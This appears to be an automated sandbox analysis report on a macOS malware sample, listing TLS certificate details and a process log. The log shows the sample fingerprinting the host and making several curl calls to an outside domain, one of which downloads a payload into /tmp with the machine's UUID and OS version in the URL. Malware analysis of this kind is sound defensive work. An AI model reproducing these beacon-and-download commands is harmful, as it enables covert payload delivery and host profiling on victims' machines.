                                                                        C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1CN=Apple Root CA, OU=Apple Certification Authority, O=Apple Inc., C=USThu Apr 28 23:38:00 CEST 2022Wed May 07 02:00:00 CEST 2025
                                                                        Apr 19, 2024 11:45:19.345654964 CEST151.101.131.6443192.168.11.1249352CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Nov 27 22:00:02 CET 2023 Wed Apr 29 14:54:50 CEST 2020Sat May 25 23:10:02 CEST 2024 Thu Apr 11 01:59:59 CEST 2030771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,05c118da645babe52f060d0754256a73c
                                                                        CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Apr 29 14:54:50 CEST 2020Thu Apr 11 01:59:59 CEST 2030

                                                                        System Behavior

                                                                        Start time (UTC):09:45:17
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/usr/libexec/xpcproxy
                                                                        Arguments:-
                                                                        File size:44048 bytes
                                                                        MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6
                                                                        Start time (UTC):09:45:17
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/usr/libexec/nsurlstoraged
                                                                        Arguments:/usr/libexec/nsurlstoraged --privileged
                                                                        File size:246624 bytes
                                                                        MD5 hash:321b0a40e24b45f0af49ba42742b3f64
                                                                        Start time (UTC):09:45:25
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
                                                                        Arguments:-
                                                                        File size:3722408 bytes
                                                                        MD5 hash:8910349f44a940d8d79318367855b236
                                                                        Start time (UTC):09:45:25
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/Users/bernard/Desktop/malw_sampl
                                                                        Arguments:/Users/bernard/Desktop/malw_sampl
                                                                        File size:47222 bytes
                                                                        MD5 hash:d3e39930bca4c4b57f6e1f241f0a31c8
                                                                        Start time (UTC):09:45:25
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:618480 bytes
                                                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                        Start time (UTC):09:45:25
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:618480 bytes
                                                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                        Start time (UTC):09:45:25
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/usr/bin/curl
                                                                        Arguments:curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0
                                                                        File size:185072 bytes
                                                                        MD5 hash:2418204e23e2952e7995f1819a1f78f5
                                                                        Start time (UTC):09:45:25
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:618480 bytes
                                                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                        Start time (UTC):09:45:25
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/usr/bin/defaults
                                                                        Arguments:defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
                                                                        File size:40000 bytes
                                                                        MD5 hash:fd63b6120ed5a062dbb6397bc9f8ffb8
                                                                        Start time (UTC):09:45:25
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:618480 bytes
                                                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                        Start time (UTC):09:45:25
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:618480 bytes
                                                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                        Start time (UTC):09:45:25
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/usr/sbin/system_profiler
                                                                        Arguments:system_profiler SPHardwareDataType
                                                                        File size:45472 bytes
                                                                        MD5 hash:271feb2b4c0447da2b7ac523f13a4824
                                                                        Start time (UTC):09:45:26
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/usr/sbin/system_profiler
                                                                        Arguments:-
                                                                        File size:45472 bytes
                                                                        MD5 hash:271feb2b4c0447da2b7ac523f13a4824
                                                                        Start time (UTC):09:45:26
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:618480 bytes
                                                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                        Start time (UTC):09:45:26
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/usr/bin/awk
                                                                        Arguments:awk /UUID/ { print $3 }
                                                                        File size:112576 bytes
                                                                        MD5 hash:c2a01c11db999f97496e09e12f468956
                                                                        Start time (UTC):09:45:26
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:618480 bytes
                                                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                        Start time (UTC):09:45:26
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:618480 bytes
                                                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                        Start time (UTC):09:45:26
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/usr/bin/curl
                                                                        Arguments:curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1
                                                                        File size:185072 bytes
                                                                        MD5 hash:2418204e23e2952e7995f1819a1f78f5
                                                                        Start time (UTC):09:45:26
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:618480 bytes
                                                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                        Start time (UTC):09:45:26
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:618480 bytes
                                                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                        Start time (UTC):09:45:26
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/usr/bin/curl
                                                                        Arguments:curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593
                                                                        File size:185072 bytes
                                                                        MD5 hash:2418204e23e2952e7995f1819a1f78f5
                                                                        Start time (UTC):09:45:26
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:618480 bytes
                                                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                        Start time (UTC):09:45:26
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:618480 bytes
                                                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                        Start time (UTC):09:45:26
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/usr/bin/curl
                                                                        Arguments:curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3
                                                                        File size:185072 bytes
                                                                        MD5 hash:2418204e23e2952e7995f1819a1f78f5
                                                                        Start time (UTC):09:46:06
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/usr/libexec/xpcproxy
                                                                        Arguments:-
                                                                        File size:44048 bytes
                                                                        MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6
                                                                        Start time (UTC):09:46:06
                                                                        Start date (UTC):19/04/2024
                                                                        Path:/usr/libexec/firmwarecheckers/eficheck/eficheck
                                                                        Arguments:/usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
                                                                        File size:74048 bytes
                                                                        MD5 hash:328beb81a2263449258057506bb4987f